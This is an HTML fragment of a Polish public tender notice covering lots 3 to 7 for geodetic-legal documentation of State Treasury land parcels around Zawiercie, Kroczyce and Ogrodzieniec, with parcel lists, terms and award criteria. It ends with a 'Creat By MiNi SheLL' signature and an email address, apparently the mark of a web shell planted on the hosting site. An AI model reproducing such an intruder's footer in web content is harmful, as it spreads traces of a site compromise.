<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 100.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przygotowanie dokumentacji geodezyjno-prawnej do regulacji stanu prawnego nieruchomości Skarbu Państwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie dokumentacji geodezyjno-prawnej z pomiarem do zasiedzenia  do regulacji stanu prawnego nieruchomości Skarbu Państwa położonych w gminie Zawiercie, oznaczonych jako działki o numerach:  4268/6  o pow. 0,0126 ha i 4268/8 o pow. 0,0102 ha,  k. m. 20 (obręb Tereny przyłączone z Kromołowa), 3807/1 k. m. 17 o pow. 0,4580 ha (obręb Kromołów), 4331 k. m. 23 o pow.0,8400 ha (obręb Kromołów), 65/1 k. m. 61, o pow. 0,0973 ha (obręb Zawiercie), 62/1 k. m. 55 o pow. 0,7079 ha (obręb Zawiercie), 106 o pow. 0,9167 ha, k. m. 60 (obręb Zawiercie), 59/1 o pow. 0,6716 ha i 59/2 o pow. 0,4739 ha    k. m. 61 (obręb Zawiercie), 62 k. m. 61 o pow. 0,9746 ha (obręb Zawiercie), 65/1 k. m. 61 o pow. 0,1269 ha, 228 k. m. 62 o pow. 1,4887 ha (obręb Zawiercie),101 k .m. 13   o pow. 1,8152 ha (obręb Zawiercie), 9 k. m. 63 o pow.0,6479 ha (obręb Zawiercie), 58 k. m. 66 o pow. 1,9850 ha ( obręb Zawiercie), 37 k. m. 67 o pow. 1,0960 ha (obręb Zawiercie),11 k. m. 68 o pow. 0,8679 ha (obręb Zawiercie), 15 k. m. 71 o pow. 1,0846 ha (obręb Zawiercie), 19 k. m. 69 o pow. 1,7365 ha (obręb Zawiercie), 67/1 k. m. 16 o pow. 0,0156 ha (obręb Zawiercie) , 166/6 k. m. 20 o pow. 0,0015 ha (obręb Zawiercie), 169/1 k. m. 20 o pow. 0,0051 ha (obręb Zawiercie), 39/7 k. m. 40 o pow. 0,0826 ha (obręb Zawiercie), 26/1 k. m. 59 o pow.0,0132 ha (obręb Zawiercie) - pow. łączna ok. 16,1295 ha (24 działki)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 100.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przygotowanie dokumentacji geodezyjno-prawnej do regulacji stanu prawnego nieruchomości Skarbu Państwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie dokumentacji geodezyjno-prawnej z pomiarem do zasiedzenia                         (z wydzieleniem dróg  publicznych dz. nr: 18, 167,16,4332) do regulacji stanu prawnego nieruchomości Skarbu Państwa położonych w gminie Zawiercie, oznaczonych jako działki  o numerach:  18 k. m. 15 o pow. 5,3652 ha (obręb Zawiercie ), 167 k. m. 31 o pow. 2,5361 ha (obręb Zawiercie), 90 k. m. 6 o pow. 3,0473 ha (obręb Zawiercie), 16 k. m. 71 o pow. 7,6975 ha (obręb Zawiercie), 4332 k. m. 22 o pow. 7,6550 (obręb Kromołów), 1811 k. m. 9 o pow. 2,1805 ha (obręb Marciszów), 70/5 k. m. 59 o pow. 2,5473 ha (obręb Zawiercie) - pow. łączna ok.  31,0289 ha (7 działek)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 100.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przygotowanie dokumentacji geodezyjno-prawnej do regulacji stanu prawnego nieruchomości Skarbu Państwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie dokumentacji geodezyjno-prawnej z pomiarem do zasiedzenia                        do regulacji stanu prawnego nieruchomości Skarbu Państwa położonych w gminie Kroczyce, oznaczonych jako działki  o numerach:  411/1 k. m. 4 o pow. 0,0304 ha (obręb Biała Błotna), 413/1 k. m. 4 o pow. 0,2550 ha (obręb Biała Błotna), 416/4 k. m. 4 o pow. 0,0156 ha (obręb Biała Błotna), 416/2 k. m. 4 o pow. 0,4699 ha (obręb Biała Błotna), 617/4 k. m. 5 o pow. 0,0243 ha (obręb Biała Błotna), 606/20 k. m. 6 o pow. 0,1092 ha (obręb Biała Błotna), 606/21 k. m. 6 o pow. 0,6703 ha (obręb Biała Błotna), 609/1 k. m. 6 o pow. 0,7983 ha (obręb Biała Błotna), 611/1 k. m. 6 o pow. 0,1633 ha (obręb Biała Błotna), 918/2 k. m. 8 o pow. 0,0338 ha (obręb Dzibice -  z wydzieleniem drogi),1/2 k. m. 1 o pow. 0,0131 ha (obręb Kroczyce Okupne), 21/2 k. m. 1 o pow. 0,0187 ha (obręb Kroczyce Okupne), 39/2 k. m. 1 o pow. 0,0049 ha(obręb Kroczyce Okupne), 55/2 k. m. 1  o pow. 0,0187 ha(obręb Kroczyce Okupne),639/1 k. m. 6 o pow.0,0379 ha(obręb Kroczyce Okupne),645/2 k. m. 6  o pow. 0,5829 ha (obręb Kroczyce Okupne),645/6 k. m. 6 o pow. 0,0543 ha (obręb Kroczyce Okupne), 463/2 k. m. 6 opow. 0,0532 ha (obręb Kroczyce Okupne), 633/1 k. m.6 o pow. 0,0237 ha(obręb Kroczyce Okupne), 1031/5 k. m. 8 o pow. 0,0320 ha (obręb Dzibice)  - pow. łączna ok.  3,4536  ha (20 działek)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 100.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przygotowanie dokumentacji geodezyjno-prawnej do regulacji stanu prawnego nieruchomości Skarbu Państwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie dokumentacji geodezyjno-prawnej do regulacji stanu prawnego nieruchomości Skarbu Państwa - działek numer: 1029/1/2,1029/3/2 i 1029/4/2 (stara numeracja zgodnie z KW) k. m. 8 o łącznej pow. ok. 2,7177 ha, (obręb  Dzibice), poprzez doprowadzenie do zgodności stanu ewidencji gruntów i budynków ze stanem ujawnionym w księdze wieczystej numer CZ1M/00004791/1..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 100.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Przygotowanie dokumentacji geodezyjno-prawnej do regulacji stanu prawnego nieruchomości Skarbu Państwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie dokumentacji geodezyjno-prawnej z pomiarem do zasiedzenia              (z wydzieleniem dróg publicznych dz. nr 643 ) do  regulacji stanu prawnego nieruchomości Skarbu Państwa położonych w gminie Ogrodzieniec, oznaczonych jako działki  o numerach: 643 k. m. 5 o pow. 2.2850 ha, 789 k. m. 6 o pow. 1,0454 ha i 901/2 k. m. 6 o pow. 8,7653 ha (obręb Fugasówka) - pow. łączna 12,0957  ha (3 działki)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 100.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com